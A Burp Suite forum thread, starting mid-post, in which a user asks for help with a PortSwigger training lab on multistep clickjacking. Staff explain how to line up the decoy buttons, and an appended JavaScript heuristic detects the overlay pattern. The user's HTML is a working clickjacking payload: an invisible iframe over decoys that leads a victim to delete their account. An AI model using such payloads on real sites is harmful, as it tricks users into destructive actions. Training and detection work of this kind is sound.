Burp Suite User Forum

Issue in solving Multistep Clickjacking

kashish | Last updated: Jan 31, 2022 12:39PM UTC

values, as the 'click me' div elements line up with the buttons that need to be clicked, but it's still not getting solved. Below is the code. Please help me with this.

```html
<style>
    iframe {
        position: relative;
        width: 500px;
        height: 700px;
        opacity: 0.0001;
        z-index: 2;
    }
    .firstClick, .secondClick {
        position: absolute;
        top: 495px;
        left: 50px;
        z-index: 1;
    }
    .secondClick {
        top: 415px;
        left: 60px;
    }
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://acc51fcc1e4f7b9bc096a993003f00bd.web-security-academy.net/my-account"></iframe>
```

Ben, PortSwigger Agent | Last updated: Jan 31, 2022 06:48PM UTC

Hi,

The issue is that the deletion process is a multi-step process and you are lining up the two 'click me' elements against both the buttons on the first stage of the process. Instead, you need to line up the first 'click me' element on the initial 'Delete' button (which you have in place) and then the second 'click me' element on the 'Yes' button that appears after you click the 'Delete' button to confirm you want the account to be deleted.

If you use the 'View exploit' functionality within the Exploit Server then you should be able to see this process more clearly and adjust the values within your payload (the written solution provides a good guide on this if you are completely stuck).
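Added example, not part of the thread or PortSwigger's material: a static heuristic a defender could run over hosted HTML to flag the overlay pattern in the payload above, a near-transparent iframe stacked above absolutely positioned decoy elements. `SAMPLE` is constructed from the posted markup with a placeholder iframe URL; `parseStyles`, `findOverlay` and the 0.1 opacity threshold are assumptions of this example.

```javascript
// Added example: static heuristic for the overlay pattern in the post above.
// SAMPLE is constructed from that post's markup; the iframe URL is a placeholder.
const SAMPLE = `
<style>
iframe { position:relative; width: 500px; height: 700px; opacity: 0.0001; z-index: 2; }
.firstClick, .secondClick { position:absolute; top: 495px; left: 50px; z-index: 1; }
.secondClick { top: 415px; left: 60px; }
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://target.example/my-account"></iframe>`;

// Collect declarations per selector from every <style> block; later rules override earlier ones.
function parseStyles(html) {
  const rules = {};
  for (const [, css] of html.matchAll(/<style[^>]*>([\s\S]*?)<\/style>/gi)) {
    for (const [, selectors, body] of css.matchAll(/([^{}]+)\{([^}]*)\}/g)) {
      for (const sel of selectors.split(',').map(s => s.trim()).filter(Boolean)) {
        const decls = (rules[sel] = rules[sel] || {});
        for (const d of body.split(';')) {
          const i = d.indexOf(':');
          if (i > 0) decls[d.slice(0, i).trim().toLowerCase()] = d.slice(i + 1).trim();
        }
      }
    }
  }
  return rules;
}

// Flag a near-invisible iframe stacked above absolutely positioned decoy elements.
function findOverlay(html, maxOpacity = 0.1) {
  const rules = parseStyles(html);
  const frame = rules['iframe'];
  if (!frame || !/<iframe\b/i.test(html)) return null;
  const opacity = parseFloat(frame.opacity || '1');
  if (!(opacity <= maxOpacity)) return null;   // also rejects NaN
  const frameZ = parseInt(frame['z-index'] || '0', 10);
  const decoys = Object.entries(rules)
    .filter(([sel, d]) => sel !== 'iframe' && d.position === 'absolute'
      && parseInt(d['z-index'] || '0', 10) < frameZ)
    .map(([sel, d]) => ({ selector: sel, top: d.top, left: d.left }));
  return decoys.length ? { opacity, frameZ, decoys } : null;
}
```

The heuristic only reads `<style>` rules with plain selectors, so inline `style` attributes and styles set from script are not covered.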
